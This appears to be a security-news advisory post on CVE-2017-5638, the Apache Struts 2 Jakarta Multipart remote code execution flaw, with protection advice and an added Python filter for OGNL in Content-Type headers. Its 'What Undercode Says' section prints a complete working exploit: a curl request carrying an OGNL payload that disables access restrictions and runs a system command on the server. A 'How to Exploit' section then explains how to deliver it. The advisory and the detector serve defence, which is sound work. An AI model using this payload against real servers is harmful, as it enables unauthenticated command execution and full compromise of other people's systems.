The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling within the Jakarta Multipart parser. When a malicious Content-Type header is sent in a file upload request, the parser incorrectly processes it, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. This occurs before the actual file upload data is parsed or any validation is applied. Since OGNL expressions can execute Java code on the server, an attacker can craft a Content-Type header containing a malicious OGNL expression. The parser interprets this expression, leading to the execution of arbitrary system commands with the same privileges as the Struts application server. This provides a direct vector for complete system compromise without requiring authentication.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical
Date: 2017-03-07
Prediction: Patch available (2017-03-07)
What Undercode Says:
curl -H "Content-Type: %{(_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context['com.opensymphony.xwork2.ActionContext.container']).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd='id').(iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(cmds=(iswin?{'cmd.exe','/c',cmd}:{'/bin/bash','-c',cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}" http://target-host.com/struts2-showcase/fileupload/doUpload.action
How to Exploit:
Craft an HTTP request with a malicious OGNL expression in the Content-Type header. The exploit payload is delivered directly in this header, bypassing standard data handling. Successful exploitation grants direct command execution on the target server.
Protection from this CVE:
Immediately upgrade to Struts 2.3.32 or 2.5.10.1. Implement WAF rules to filter malicious Content-Type headers. Disable the Jakarta Multipart parser if unused.
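The header filtering recommended above, as an added defender-side example that is not part of the original post: it percent-decodes each Content-Type value, flags OGNL syntax, and otherwise requires the value to parse as a plain media type. The sample requests are constructed for this example, not captured traffic, and the marker list and grammar are this example's own choices.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not captured traffic): benign uploads plus
# headers carrying OGNL syntax, one percent-encoded as a proxy log might show it.
SAMPLE_REQUESTS = [
    {"id": 1, "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxk"},
    {"id": 2, "Content-Type": "application/x-www-form-urlencoded"},
    {"id": 3, "Content-Type": "%{(#_='multipart/form-data').(#x=1)}"},
    {"id": 4, "Content-Type": "%25%7B(%23_%3D'multipart/form-data')%7D"},
    {"id": 5, "Content-Type": 'text/plain; charset="utf-8"'},
    {"id": 6, "Content-Type": "not a media type"},
]

# Media type grammar from RFC 7231 section 3.1.1.1: type/subtype followed by
# optional ;name=value parameters, where value is a token or a quoted string.
_TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
_QUOTED = r'"[^"]*"'
_MEDIA_TYPE_RE = re.compile(
    rf"^\s*{_TOKEN}/{_TOKEN}(?:\s*;\s*{_TOKEN}=(?:{_TOKEN}|{_QUOTED}))*\s*$"
)

# Syntax that belongs to an OGNL expression, never to a real media type:
# %{ and ${ delimiters, #var= assignments, @pkg.Class@ references, _memberAccess.
_OGNL_MARKERS = re.compile(r"%\{|\$\{|#\w+\s*=|@[A-Za-z_][\w.]*@|_memberAccess")


def classify_content_type(header):
    """Return (suspicious, reason): percent-decode, look for OGNL markers,
    then require the value to parse as a media type."""
    decoded = unquote(header)
    marker = _OGNL_MARKERS.search(decoded)
    if marker:
        return True, f"OGNL marker {marker.group(0)!r}"
    if not _MEDIA_TYPE_RE.match(decoded):
        return True, "does not parse as a media type"
    return False, "ok"


def scan_requests(requests):
    """Return [(request id, reason)] for every request with a suspicious Content-Type."""
    findings = []
    for req in requests:
        suspicious, reason = classify_content_type(req.get("Content-Type", ""))
        if suspicious:
            findings.append((req["id"], reason))
    return findings
```

The grammar check alone would accept OGNL hidden inside a quoted parameter value, which is why the marker search runs first; either way this is a stopgap, and the upgrade is the actual fix.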
Impact:
Full system compromise. Unauthenticated attackers can achieve remote code execution, leading to data theft, server takeover, and deployment of further malware.
Sources:
Reported By: nvd.nist.gov